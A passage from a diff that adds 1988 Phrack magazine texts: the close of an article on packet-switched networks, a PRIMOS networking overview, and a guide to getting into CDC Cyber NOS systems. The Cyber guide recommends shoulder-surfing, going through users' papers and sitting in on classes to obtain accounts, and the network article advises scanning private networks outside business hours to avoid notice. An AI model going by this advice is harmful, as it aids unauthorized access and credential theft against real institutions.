|
||||
modem, almost always connected directly to a server, or a port selector. This
|
||||
method of communicating is more efficient, safer, and more reliable than using
|
||||
any code. Besides, with the implementation of equal access, and the
|
||||
elimination of 950 ports, what choice will you have?
|
||||
|
||||
Some Important Networks -
|
||||
|
||||
As aforementioned, PSNs are not only used in the United States. They are
|
||||
all over the place. In Europe, Asia, Canada, Africa, etc. This is a small
|
||||
summary of some of the more popular PSNs around the world.
|
||||
|
||||
Country Network Name *DNIC
|
||||
~~~~~~~ ~~~~~~~ ~~~~ ~~~~
|
||||
Germany Datex-P 2624
|
||||
Canada Datapac 3020
|
||||
Italy Datex-P 0222
|
||||
South Africa Saponet 0655
|
||||
Japan Venus-P 4408
|
||||
England Janet/PSS 2342
|
||||
USA Tymnet 3106
|
||||
USA Telenet 3110
|
||||
USA Autonet 3126
|
||||
USA RCA 3113
|
||||
Australia Austpac 0505
|
||||
Ireland Irepac 2724
|
||||
Luxembourg Luxpac 2704
|
||||
Singapore Telepac 5252
|
||||
France Transpac 2080
|
||||
Switzerland Telepac 2284
|
||||
Sweden Telepac 2405
|
||||
Israel Isranet 4251
|
||||
~~~~~~~~~ ~~~~~~~ ~~~~
|
||||
* - DNIC (Data Network Identification Code)
|
||||
Precede DNIC and logical address with a
|
||||
'0' when using Telenet.
|
||||
______________________________________________________________________________
|
||||
|
||||
Notes On Above Networks -
|
||||
|
||||
Some countries may have more than one Packet Switching Network. The ones
|
||||
listed are the more significant networks for each country. For example, the
|
||||
United States has eleven public Packet Switching Networks, but the four I
|
||||
listed are the major ones.
|
||||
|
||||
Several countries may also share one network, as shown above. Each country
|
||||
will have equal access to the network using the basic POTS dial-up ports.
|
||||
|
||||
Focus On Telenet -
|
||||
|
||||
Since Telenet is one of the most famous, and highly used PSNs in the United
|
||||
States, I thought that informing you of some of the more interesting aspects
|
||||
of this network would be beneficial.
|
||||
|
||||
Interconnections With Other Network Types -
|
||||
|
||||
Packet Switched Networks are not the only type of networks which connect a
|
||||
large capacity of hosts together. There are also Wide Area Networks, which
|
||||
operate on a continuous link basis, rather than a packet switched basis.
|
||||
These networks do not use the standardized X.25 protocol, and can only be
|
||||
reached by direct dial-ups, or by connecting to a host which has network
|
||||
access permissions. The point is, that if you wanted to reach, say, Arpanet
|
||||
from Telenet, you would have to have access to a host which is connected to
|
||||
both networks. This way, you can connect to the target host computer via
|
||||
Telenet, and use the WAN via the target host.
|
||||
|
||||
WANs aren't the only other networks you can access. Also, connections to
|
||||
other small, private, interoffice LANs are quite common and quite feasible.
|
||||
|
||||
Connections To International NUAs via NUIs -
|
||||
|
||||
When using an NUI, at the prompt, type 0+DNIC+NUA. After your connection
|
||||
is established, proceed to use the system you've reached.
|
||||
|
||||
Private Data Networks -
|
||||
|
||||
Within the large Packet Switched Networks that are accessible to us there
|
||||
are also smaller private networks. These networks can sometimes be very
|
||||
interesting as they may contain many different systems. A way to identify a
|
||||
private network is by looking at the three digit prefix. Most prefixes
|
||||
accessible by Telenet are based on area codes. Private networks often have a
|
||||
prefix that has nothing to do with any area code. (Ex. 322, 421, 224, 144)
|
||||
Those prefixes are not real networks, just examples.
|
||||
|
||||
Inside these private networks, there are often smaller networks which are
|
||||
connected with some type of host selector or gateway server. If you find
|
||||
something like this, there may be hosts that can be accessed only by this port
|
||||
selector/server, and not by the normal prefix. It is best to find out what
|
||||
these other addresses translate to, in case you are not able to access the
|
||||
server for some reason. That way, you always have a backup method of reaching
|
||||
the target system (Usually the addresses that are accessed by a gateway
|
||||
server/port selector translate to normal NUAs accessible from your Telenet
|
||||
port).
|
||||
|
||||
When exploring a private network, keep in mind that since these networks
|
||||
are smaller, they would most likely be watched more closely during business
|
||||
hours then say Telenet or Tymnet. Try to keep your scanning and tinkering
|
||||
down to a minimum on business hours to avoid any unnecessary trouble.
|
||||
Remember, things tend to last longer if you don't abuse the hell out of them.
|
||||
|
||||
Summary -
|
||||
|
||||
I hope this file helped you out a bit, and at least gave you a general idea
|
||||
of what PSNs are used for, and some of the advantages of using these networks.
|
||||
If you can find something interesting during your explorations of PSNs, or
|
||||
Private Data Networks, share it, and spread the knowledge around. Definitely
|
||||
exploit what you've found, and use it to your advantage, but don't abuse it.
|
||||
|
||||
If you have any questions or comments, you reach me on -
|
||||
|
||||
The FreeWorld II/Central Office/Forgotten Realm/TOP.
|
||||
|
||||
I hope you enjoyed my file. Thanks for your time. I should be writing a
|
||||
follow up article to this one as soon as I can. Stay safe..
|
||||
|
||||
- Epsilon
|
||||
______________________________________________________________________________
|
||||
|
||||
- Thanks To -
|
||||
|
||||
Prime Suspect/Sir Qix/The Technic/Empty Promise/The Leftist
|
||||
______________________________________________________________________________
|
246
phrack18/4.txt
Normal file
246
phrack18/4.txt
Normal file
|
@ -0,0 +1,246 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #4 of 11
|
||||
|
||||
-------------------------------------------------------------------------
|
||||
- -
|
||||
- -
|
||||
- PRIMOS: -
|
||||
- NETWORK COMMUNICATIONS -
|
||||
- -
|
||||
- PRIMENET, RJE, DPTX -
|
||||
- -
|
||||
- -
|
||||
- Presented by Magic Hasan June 1988 -
|
||||
-------------------------------------------------------------------------
|
||||
|
||||
|
||||
PRIME's uniform operating system, PRIMOS, supports a wide range of
|
||||
communications products to suit any distributed processing need. The PRIMENET
|
||||
distributed networking facility provides complete local and remote network
|
||||
communication services for all PRIME systems. PRIME's Remote Job Entry (RJE)
|
||||
products enable multi-user PRIME systems to emulate IBM, CDC, Univac,
|
||||
Honeywell and ICL remote job entry terminals over synchronous communication
|
||||
lines. PRIME's Distributed Processing Terminal Executive (DPTX) allows users
|
||||
to construct communication networks with PRIME and IBM-compatible equipment.
|
||||
|
||||
PRIMENET
|
||||
--------
|
||||
|
||||
PRIMENET provides complete local and remote network communication services
|
||||
for all PRIME systems. PRIMENET networking software lets a user or process on
|
||||
one PRIME system communicate with any other PRIME system in the network
|
||||
without concern for any protocol details. A user can log in to any computer
|
||||
in the network from any terminal in the network. With PRIMENET, networking
|
||||
software processes running concurrently on different systems can communicate
|
||||
interactively. PRIMENET allows transparent access to any system in the
|
||||
network without burdening the user with extra commands.
|
||||
|
||||
PRIMENET has been designed and implemented so that user interface is simple
|
||||
and transparent. Running on a remote system from a local node of the network
|
||||
or accessing remote files requires no reprogramming of user applications or
|
||||
extensive user training. All the intricacies and communication protocols of
|
||||
the network are handled by the PRIMENET software. For both the local and
|
||||
remote networks, PRIMENET will allow users to share documents, files, and
|
||||
programs and use any disk or printer configured in the network.
|
||||
|
||||
For a local network between physically adjacent systems, PRIME offers the
|
||||
high-performance microprocessor, the PRIMENET Node Controller (PNC). The
|
||||
controller users direct memory access for low overhead and allows loosely
|
||||
coupled nodes to share resources in an efficient manner. The PNCs for each
|
||||
system are connected to each other with a coaxial cable to form a high-speed
|
||||
ring network, with up to 750 feet (230 meters) between any two systems.
|
||||
|
||||
Any system in the PNC ring can establish virtual circuits with any other
|
||||
system, making PNC-based networks "fully connected" with a direct path between
|
||||
each pair of systems. The ring has sufficient bandwidth (1 MB per second) and
|
||||
addressing capability to accommodate over 200 systems in a ring structure;
|
||||
however, PRIMENET currently supports up to sixteen systems on a ring to
|
||||
operate as a single local network.
|
||||
|
||||
The PRIMENET Node Controller is designed to assure continuity of operation
|
||||
in the event that one of the systems fails. One system can be removed from
|
||||
the network or restored to on-line status without disturbing the operations of
|
||||
the other system. An active node is unaware of messages destined for other
|
||||
nodes in the network, and the CPU is notified only when a message for that
|
||||
node has been correctly received.
|
||||
|
||||
Synchronous communications over dedicated leased lines or dial-up lines is
|
||||
provided through the Multiple Data Link Controller (MDLC). This controller
|
||||
handles certain protocol formatting and data transfer functions normally
|
||||
performed by the operating system in other computers. The controller's
|
||||
microprogrammed architecture increases throughput by eliminating many tasks
|
||||
from central processor overhead.
|
||||
|
||||
The communications controller also supports multiple protocols for
|
||||
packet-switched communications with Public Data Networks such as the United
|
||||
States' TELENET and TYMNET, the Canadian DATAPAC, Great Britain's
|
||||
International Packet Switching Service (IPSS), France's TRANSPAC, and the
|
||||
European Packet Switching Network, EURONET. Most Public Data Networks require
|
||||
computers to use the CCITT X.25 protocol to deal with the management of
|
||||
virtual circuits between a system and others in the network. The synchronous
|
||||
communications controller supports this protocol. PRIME can provide the X.25
|
||||
protocol for use with the PRIMENET networking software without modification to
|
||||
the existing hardware configuration.
|
||||
|
||||
PRIMENET software offers three distinct sets of services. The
|
||||
Inter-Program Communication Facility (IPCF) lets programs running under the
|
||||
PRIMOS operating system establish communications paths (Virtual circuits) to
|
||||
programs in the same or another PRIME system, or in other vendors' systems
|
||||
supporting the CCITT X.25 standard for packet switching networks. The
|
||||
Interactive Terminal Support (ITS) facility permits terminals attached to a
|
||||
packet switching network, or to another PRIME system, to log-in to a PRIME
|
||||
system with the same capabilities they would have if they were directly
|
||||
attached to the system. The File Access Manager (FAM) allows terminal users
|
||||
or programs running under the PRIMOS operating system to utilize files
|
||||
physically stored on other PRIME systems in a network. Remote file operations
|
||||
are logically transparent to the application program. This means no new
|
||||
applications and commands need to be learned for network operation.
|
||||
|
||||
The IPCF facility allows programs in a PRIME computer to exchange data with
|
||||
programs in the same computer, another PRIME computer, or another vendor's
|
||||
computer, assuming that that vendor supports X.25. This feature is the most
|
||||
flexible and powerful one that any network software package can provide. It
|
||||
basically allows an applications programmer to split up a program, so that
|
||||
different pieces of the program execute on different machines a network. Each
|
||||
program component can be located close to the resource (terminals, data,
|
||||
special peripherals, etc.) it must handle, decode the various pieces and
|
||||
exchange data as needed, using whatever message formats the application
|
||||
designer deems appropriate. The programmer sees PRIMENET's IPCF as a series
|
||||
of pipes through which data can flow. The mechanics of how the data flows are
|
||||
invisible; it just "happens" when the appropriate services are requested. If
|
||||
the two programs happen to end up on the same machine, the IPCF mechanism
|
||||
still works. The IPCF offers the following advantages:
|
||||
|
||||
1) The User does not need to understand the detailed
|
||||
mechanisms of communications software in order to
|
||||
communicate.
|
||||
2) Calls are device-independent. The same program will
|
||||
work over physical links implemented by the local node
|
||||
controller (local network), leased lines, or a packet
|
||||
network.
|
||||
3) Programs on one system can concurrently communicate
|
||||
with programs on other systems using a single
|
||||
communications controller. PRIMENET handles all
|
||||
multiplexing of communications facilities.
|
||||
4) A single program can establish multiple virtual
|
||||
circuits to other programs in the network.
|
||||
|
||||
PRIMENET's ITS facility allows an interactive terminal to have access to
|
||||
any machine in the network. This means that terminals can be connected into
|
||||
an X.25 packet network along with PRIME computers. Terminal traffic between
|
||||
two systems is multiplexed over the same physical facilities as inter-program
|
||||
data, so no additional hardware is needed to share terminals between systems.
|
||||
|
||||
This feature is ordinarily invisible to user programs, which cannot
|
||||
distinguish data entering via a packet network from data coming in over AMLC
|
||||
lines. A variant of the IPCF facility allows users to include the terminal
|
||||
handling protocol code in their own virtual space, thus enabling them to
|
||||
control multiple terminals on the packet network within one program.
|
||||
Terminals entering PRIMOS in this fashion do not pass through the usual log-in
|
||||
facility, but are immediately connected to the application program they
|
||||
request. (The application program provides whatever security checking is
|
||||
required.)
|
||||
|
||||
The result is the most effective available means to provide multi-system
|
||||
access to a single terminal, with much lower costs for data communications and
|
||||
a network which is truly available to all users without the expense of
|
||||
building a complicated private network of multiplexors and concentrators.
|
||||
|
||||
By utilizing PRIMENET's File Access Manager (FAM), programs running under
|
||||
PRIMOS can access files on other PRIME systems using the same mechanisms used
|
||||
to access local files. This feature allows users to move from a single-system
|
||||
environment to a multiple-system one without difficulty. When a program and
|
||||
the files it uses are separated into two (or more) systems the File Access
|
||||
Management (FAM)is automatically called upon whenever the program attempts to
|
||||
use the file. Remote file operations are logically transparent to the user
|
||||
or program.
|
||||
|
||||
When a request to locate a file or directory cannot be satisfied locally,
|
||||
the File Access Manager is invoked to find the data elsewhere in the network.
|
||||
PRIMOS initiates a remote procedure call to the remote system and suspends the
|
||||
user. This procedure call is received by an answering slave process on the
|
||||
remote system, which performs the requested operation and returns data via
|
||||
subroutine parameters. The slave process on the remote system is dedicated to
|
||||
its calling master process (user) on the local system until released. A
|
||||
master process (user) can have a slave process on each of several remote
|
||||
systems simultaneously. This means that each user has a dedicated connection
|
||||
for the duration of the remote access activity so many requests can be
|
||||
handled in parallel.
|
||||
|
||||
FAM operation is independent of the specific network hardware connecting
|
||||
the nodes. There is no need to rewrite programs or learn new commands when
|
||||
moving to the network environment. Furthermore, the user need only be
|
||||
logged-in to one system in the network, regardless of the location of the
|
||||
file. Files on the local system or remote systems can be accessed dynamically
|
||||
by file name within a program, using the language-specific open and close
|
||||
statements. No external job control language statements are needed for the
|
||||
program to access files. Inter-host file transfers and editing can be
|
||||
performed using the same PRIMOS utilities within the local system by
|
||||
referencing the remote files with their actual file names.
|
||||
|
||||
REMOTE JOB ENTRY
|
||||
----------------
|
||||
|
||||
PRIME's Remote Job Entry (RJE) software enables a PRIME system to emulate
|
||||
IBM, CDC, Univac, Honeywell and ICL remote job entry terminals over
|
||||
synchronous communication lines. PRIME's RJE provides the same communications
|
||||
and peripheral support as the RJE terminals they emulate, appearing to the
|
||||
host processor to be those terminals. All PRIME RJE products provide three
|
||||
unique benefits:
|
||||
|
||||
* PRIME RJE is designed to communicate with multiple
|
||||
remote sites simultaneously.
|
||||
|
||||
* PRIME RJE enables any terminal connected to a PRIME system to
|
||||
submit jobs for transmission to remote processors, eliminating the
|
||||
requirement for dedicated terminals or RJE stations at each
|
||||
location.
|
||||
|
||||
* PRIME's mainframe capabilities permit concurrent running of RJE
|
||||
emulators, program development and production work.
|
||||
|
||||
PRIME's RJE supports half-duplex, point-to-point, synchronous
|
||||
communications and operates over dial-up and dedicated lines. It is fully
|
||||
supported by the PRIMOS operating system.
|
||||
|
||||
|
||||
DISTRIBUTED PROCESSING TERMINAL EXECUTIVE (DPTX)
|
||||
------------------------------------------------
|
||||
|
||||
PRIME's Distributed Processing Terminal Executive (DPTX) allows users to
|
||||
construct communication networks with PRIME and IBM-compatible equipment.
|
||||
DPTX conforms to IBM 3271/3277 Display System protocols, and can be integrated
|
||||
into networks containing IBM mainframes, terminals and printers without
|
||||
changing application code or access methods and operates under the PRIMOS
|
||||
operating system.
|
||||
|
||||
DPTX is compatible with all IBM 370 systems and a variety of access methods
|
||||
and teleprocessing monitors: BTAM, TCAM, VTAM, IMS/VS, CIC/VS, and TSO. They
|
||||
provide transmission speeds up to 9600 bps using IBM's Binary Synchronous
|
||||
Communications (BSC) protocol.
|
||||
|
||||
DPTX is comprised of three software modules that allow PRIME systems to
|
||||
emulate and support IBM or IBM compatible 3271/3277 Display Systems. One
|
||||
module, Data Stream Compatibility (DPTX/DSC), allows the PRIME system to
|
||||
emulate the operation of a 3271 on the IBM system. This enables both terminal
|
||||
user and application programs (interactive or batch) on the PRIME System to
|
||||
reach application programs on an IBM mainframe. A second module, Terminal
|
||||
Support Facility (DPTX/TSF), allows a PRIME system to control a network of IBM
|
||||
3271/3277 devices. This enables terminal users to reach application programs
|
||||
on a PRIME computer. The third module, Transparent Connect Facility
|
||||
(DPTX/TCF), combines the functions of modules one and two with additional
|
||||
software allowing 3277 terminal users to to reach programs on a IBM mainframe,
|
||||
even though the terminal subsystem is physically connected to a PRIME system,
|
||||
which is connected to an IBM system.
|
||||
|
||||
PRIMOS offers a variety of different Communication applications. Being
|
||||
able to utilize these applications to their fullest extent can make life easy
|
||||
for a Primos "enthusiast." If you're a beginner with Primos, the best way to
|
||||
learn more, as with any other system, is to get some "hands-on" experience.
|
||||
Look forward to seeing some beginner PRIMOS files in the near future. -MH
|
||||
------------------------------------------------------------------------------
|
||||
|
||||
Special thanks to PRIME INC. for unwittingly providing the text for this
|
||||
article.
|
||||
===============================================================================
|
356
phrack18/5.txt
Normal file
356
phrack18/5.txt
Normal file
|
@ -0,0 +1,356 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #5 of 11
|
||||
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
-= =-
|
||||
-= Hacking Control Data Corporation's Cyber =-
|
||||
-= =-
|
||||
-= Written by Phrozen Ghost, April 23, 1988 =-
|
||||
-= =-
|
||||
-= Exclusively for Phrack Magazine =-
|
||||
-= =-
|
||||
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
|
||||
|
||||
This article will cover getting into and using NOS (Networking Operating
|
||||
System) version 2.5.2 running on a Cyber 730 computer. Cybers generally run
|
||||
this operating system so I will just refer to this environ- ment as Cyber.
|
||||
Also, Cyber is a slow and outdated operating system that is primarily used
|
||||
only for college campuses for running compilers. First off after you have
|
||||
scanned a bunch of carriers you will need to know how Cyber identifies itself.
|
||||
It goes like this:
|
||||
|
||||
WELCOME TO THE NOS SOFTWARE SYSTEM.
|
||||
COPYRIGHT CONTROL DATA 1978, 1987.
|
||||
|
||||
88/02/16. 02.36.53. N265100
|
||||
CSUS CYBER 170-730. NOS 2.5.2-678/3.
|
||||
FAMILY:
|
||||
|
||||
You would normally just hit return at the family prompt. Next prompt is:
|
||||
|
||||
USER NAME:
|
||||
|
||||
Usernames are in the format abcdxxx where a is the location of where the
|
||||
account is being used from (A-Z). the b is a grouping specifying privs and
|
||||
limits for the account- usually A-G -where A is the lowest access. Some
|
||||
examples of how they would be used in a college system:
|
||||
A = lowest access - class accounts for students
|
||||
B = slightly higher than A (for students working on large projects)
|
||||
C = Much higher limits, these accounts are usually not too hard to get and
|
||||
they will normally last a long time! Lab assistants use these.
|
||||
D = Instructors, Lecturers, Professors.. etc..
|
||||
E = same... (very hard to get these!)
|
||||
|
||||
The C and D positions are usually constant according to the groupings.
|
||||
For example, a class would have accounts ranging from NADRAAA-AZZ
|
||||
^^^ ^^^
|
||||
These can also be digits
|
||||
|
||||
There are also special operator accounts which start with digits instead of
|
||||
numbers. (ie 7ETPDOC) These accounts can run programs such as the monitor
|
||||
which can observe any tty connected to the system...
|
||||
|
||||
The next prompt will be for the password, student account passwords cannot be
|
||||
changed and are 7 random letters by default, other account passwords can be
|
||||
changed. You get 3 tries until you are logged out. It is very difficult if
|
||||
not impossible to use a brute force hacker or try to guess someone's account..
|
||||
so how do you get on? Here's one easy way... Go down to your local college
|
||||
(make sure they have a Cyber computer!) then just buy a class catalog (they
|
||||
only cost around 50 cents) or you could look, borrow, steal someone else's...
|
||||
then find a pascal or fortran class that fits your schedule! You will only
|
||||
have to attend the class 3 or 4 times max. Once you get there you should have
|
||||
no trouble, but if the instructor asks you questions about why you are not on
|
||||
the roll, just tell him that you are auditing the class (taking it without
|
||||
enrolling so it won't affect your GPA). The instructor will usually pass out
|
||||
accounts on the 3rd or 4th day of class.. this method also works well with
|
||||
just about any system they have on campus! Another way to get accounts is to
|
||||
go down to the computer lab and start snooping! Look over someone's shoulder
|
||||
while they type in their password, or look thru someone's papers while they're
|
||||
in the bathroom, or look thru the assistants desk while he is helping
|
||||
someone... (I have acquired accounts both ways, and the first way is a lot
|
||||
easier with less hassles) Also, you can use commas instead of returns when
|
||||
entering username and password.
|
||||
Example: at the family prompt, you could type ,nadrajf,dsfgkcd
|
||||
or at the username prompt nadrajf,dsfgkcd
|
||||
|
||||
After you enter your info, the system will respond with:
|
||||
|
||||
JSN: APXV, NAMIAF
|
||||
/
|
||||
|
||||
The 'APXV, NAMIAF' could be different depending on what job you were attached
|
||||
to. The help program looks a lot neater if you have vt100 emulation, if you
|
||||
do, type [screen,vt100] (don't type the brackets! from now on, all commands I
|
||||
refer to will be enclosed in brackets) Then type help for an extensive
|
||||
tutorial or a list of commands. Your best bet at this point is to buy a quick
|
||||
reference guide at the campus because I am only going to describe the most
|
||||
useful commands. The / means you are in the batch subsystem, there are usually
|
||||
6 or 7 other subsystems like basic, fortran, etc... return to batch mode by
|
||||
typing [batch].
|
||||
|
||||
Some useful commands:
|
||||
|
||||
CATLIST - will show permanent files in your directory.
|
||||
ENQUIRE,F - displays temporary files in your workspace.
|
||||
LIMITS - displays your privileges.
|
||||
INFO - get more on-line help.
|
||||
R - re-execute last command.
|
||||
GET,fn - loads fn into the local file area.
|
||||
CHANGE - change certain specs on a file.
|
||||
PERMIT - allow other users to use one of your files.
|
||||
REWIND,* - rewinds all your local files.
|
||||
NEW,fn - creates new file.
|
||||
PURGE - deletes files.
|
||||
LIST,F=fn - list file.
|
||||
UPROC - create an auto-execute procedure file.
|
||||
MAIL - send/receive private mail.
|
||||
BYE - logoff.
|
||||
|
||||
Use the [helpme,cmd] command for the exact syntax and parameters of these
|
||||
commands. There are also several machine specific 'application' programs such
|
||||
as pascal, fortran, spitbol, millions of others that you can look up with the
|
||||
INFO command... there are also the text editors; edit, xedit, and fse (full
|
||||
screen editor). Xedit is the easiest to use if you are not at a Telray 1061
|
||||
terminal and it has full documentation. Simply type [xedit,fn] to edit the
|
||||
file 'fn'.
|
||||
|
||||
Special control characters used with Cyber:
|
||||
|
||||
Control S and Control Q work normally, the terminate character is Control T
|
||||
followed by a carriage return. If you wanted to break out of an auto-execute
|
||||
login program, you would have to hit ^T C/R very fast and repetitively in
|
||||
order to break into the batch subsystem. Control Z is used to set environment
|
||||
variables and execute special low level commands, example: [^Z TM C/R] this
|
||||
will terminate your connection...
|
||||
|
||||
So now you're thinking, what the hell is Cyber good for? Well, they won't
|
||||
have any phone company records, and you can't get credit information from one,
|
||||
and I am not going to tell you how to crash it since crashing systems is a
|
||||
sin. There are uses for a Cyber though, one handy use is to set up a chat
|
||||
system, as there are normally 30-40 lines going into a large university Cyber
|
||||
system. I have the source for a chat program called the communicator that I
|
||||
will be releasing soon. Another use is some kind of underground information
|
||||
exchange that people frequently set up on other systems, this can easily be
|
||||
done with Cyber.
|
||||
|
||||
Procedure files:
|
||||
|
||||
A procedure file is similar to a batch file for MS-DOS, and a shell script for
|
||||
UNIX. You can make a procedure file auto-execute by using the UPROC command
|
||||
like [uproc,auto] will make the file 'auto', auto execute. There is also a
|
||||
special procedure file called the procfile in which any procedure may be
|
||||
accessed by simply a - in front of it. If your procfile read:
|
||||
|
||||
.proc,cn.
|
||||
.* sample procedure
|
||||
$catlist/un=7etpdoc.
|
||||
$exit.
|
||||
|
||||
then you could simply type -cn and the / prompt and it would execute the
|
||||
catlist command. Now back to uprocs, you could easily write a whole BBS in a
|
||||
procedure file or say you wanted to run a chat system and you did not want
|
||||
people to change the password on your account, you could do this:
|
||||
|
||||
.proc,chat,
|
||||
PW"Password: "=(*A).
|
||||
$ife,PW="cyber",yes.
|
||||
$chat.
|
||||
$revert.
|
||||
$bye.
|
||||
$else,yes.
|
||||
$note./Wrong password, try again/.
|
||||
$revert.
|
||||
$bye.
|
||||
$endif,yes.
|
||||
|
||||
This procedure will ask the user for a password and if he doesn't type "cyber"
|
||||
he will be logged off. If he does get it right then he will be dumped into
|
||||
the chat program and as soon as he exits the chat program, he will be logged
|
||||
off. This way, the user cannot get into the batch subsystem and change your
|
||||
password or otherwise screw around with the account. The following is a
|
||||
listing of the procfil that I use on my local system, it has a lot of handy
|
||||
utilities and examples...
|
||||
|
||||
---- cut here ----
|
||||
|
||||
.PROC,B.
|
||||
.******BYE******
|
||||
$DAYFILE.
|
||||
$NOTE.//////////////////////////
|
||||
$ASCII.
|
||||
$BYE.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,TIME.
|
||||
.******GIVES DAY AND TIME******
|
||||
$NOTE./THE CURRENT DAY AND TIME IS/
|
||||
$FIND,CLOCK./
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,SIGN*I,IN.
|
||||
.******SIGN PRINT UTILITY******.
|
||||
$GET,IN.
|
||||
$FIND,SIGN,#I=IN,#L=OUT.
|
||||
$NOTE./TO PRINT, TYPE: PRINT,OUT,CC,RPS=??/
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,TA.
|
||||
.******TALK******
|
||||
$SACFIND,AID,COMM.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,DIR,UN=,FILE=.
|
||||
.******DIRECTORY LISTING OF PERMANENT FILES******
|
||||
$GET(ZZZZDIR=CAT/#UN=1GTL0CL)
|
||||
ZZZZDIR(FILE,#UN=UN)
|
||||
$RETURN(ZZZZDIR)
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,Z19.
|
||||
.******SET SCREEN TO Z19******
|
||||
$SCREEN,Z19.
|
||||
$NOTE./SCREEN,Z19.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,VT.
|
||||
.******SET SCREEN TO VT100******
|
||||
$SCREEN,VT100.
|
||||
$NOTE./SCREEN,VT100.
|
||||
$REVERT,NOLIST
|
||||
#EOR
|
||||
.PROC,SC.
|
||||
.******SET SCREEN TO T10******
|
||||
$SCREEN,T10.
|
||||
$NOTE./SCREEN,T10.
|
||||
$REVERT,NOLIST
|
||||
#EOR
|
||||
.PROC,C.
|
||||
.******CATLIST******
|
||||
$CATLIST.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,CA.
|
||||
.******CATLIST,LO=F******
|
||||
$CATLIST,LO=F.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,MT.
|
||||
.******BBS******
|
||||
$SACFIND,AID,MTAB.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,LI,FILE=.
|
||||
.******LIST FILE******
|
||||
$GET,FILE.
|
||||
$ASCII.
|
||||
$COPY(FILE)
|
||||
$REVERT.
|
||||
$EXIT.
|
||||
$CSET(NORMAL)
|
||||
$REVERT,NOLIST. WHERE IS THAT FILE??
|
||||
#EOR
|
||||
.PROC,LOCAL.
|
||||
.******DIRECTORY OF LOCAL FILES******
|
||||
$RETURN(PROCLIB,YYYYBAD,YYYYPRC)
|
||||
$GET(QQQFILE=ENQF/UN=1GTL0CL)
|
||||
QQQFILE.
|
||||
$REVERT,NOLIST.
|
||||
$EXIT.
|
||||
$REVERT. FILES ERROR
|
||||
#EOR
|
||||
.PROC,RL.
|
||||
.******RAISE LIMITS******
|
||||
$SETASL(*)
|
||||
$SETJSL(*)
|
||||
$SETTL(*)
|
||||
$CSET(ASCII)
|
||||
$NOTE./ Limits now at max validated levels.
|
||||
$CSET(NORMAL)
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,CL.
|
||||
.******CLEAR******
|
||||
$CLEAR,*.
|
||||
$CSET(ASCII)
|
||||
$NOTE./LOCAL FILE AREA CLEARED
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,P,FILE=THING,LST=LIST.
|
||||
.***********************************************************
|
||||
$CLEAR.
|
||||
$GET(FILE)
|
||||
$PASCAL4,FILE,LST.
|
||||
$REVERT.
|
||||
$EXIT.
|
||||
$REWIND,*.
|
||||
$CSET(ASCII)
|
||||
$COPY(LIST)
|
||||
$CSET(NORMAL)
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,RE.
|
||||
.******REWIND******
|
||||
$REWIND,*.
|
||||
$CSET(ASCII)
|
||||
$NOTE./REWOUND.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,FOR,FILE,LST=LIST.
|
||||
.********************************************************************
|
||||
$CLEAR.
|
||||
$GET(FILE)
|
||||
$FTN5,I=FILE,L=LST.
|
||||
$REPLACE(LST=L)
|
||||
$CSET(ASCII)
|
||||
$REVERT. Fortran Compiled
|
||||
$EXIT.
|
||||
$REWIND,*.
|
||||
$COPY(LST)
|
||||
$REVERT. That's all folks.
|
||||
#EOR
|
||||
.PROC,WAR.
|
||||
.******WARBLES******
|
||||
$SACFIND,AID,WAR.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,M.
|
||||
.******MAIL/CHECK******
|
||||
$MAIL/CHECK.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,MA.
|
||||
.******ENTER MAIL******
|
||||
$MAIL.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,HE,FILE=SUMPROC,UN=.
|
||||
.******HELP FILE******
|
||||
$GET,FILE/#UN=UN.
|
||||
$COPY(FILE)
|
||||
$REVERT.
|
||||
$EXIT.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
.PROC,DYNAMO.
|
||||
.******WHO KNOWS??******
|
||||
$GET,DYNMEXP/UN=7ETPDOC.
|
||||
$SKIPR,DYNMEXP.
|
||||
$COPYBR,DYNMEXP,GO.
|
||||
$FIND,DYNAMO,GO.
|
||||
$REVERT,NOLIST.
|
||||
#EOR
|
||||
#EOR
|
||||
#EOI
|
||||
|
||||
---- cut here ----
|
||||
|
||||
I have covered procfil's fairly extensively as I think it is the most useful
|
||||
function of Cyber for hackers. I will be releasing source codes for several
|
||||
programs including 'the communicator' chat utility, and a BBS program with a
|
||||
full message base. If you have any questions about Cyber or you have gotten
|
||||
into one and don't know what to do, I can be contacted at the Forgotten Realm
|
||||
BBS or via UUCP mail at ...!uunet!ncoast!ghost.
|
||||
|
||||
Phrozen Ghost
|
||||
===============================================================================
|
244
phrack18/6.txt
Normal file
244
phrack18/6.txt
Normal file
|
@ -0,0 +1,244 @@
|
|||
==Phrack Inc.==
|
||||
|
||||
Volume Two, Issue 18, Phile #6 of 11
|
||||
|
||||
------------------------------------------------------------------------------
|
||||
Unix for the Moderate
|
||||
-------------------------------------------------------------------------------
|
||||
By: The Urvile, Necron 99, and a host of me.
|
||||
-------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer:
|
||||
|
||||
This is mainly for system five. I do reference BSD occasionally, but I
|
||||
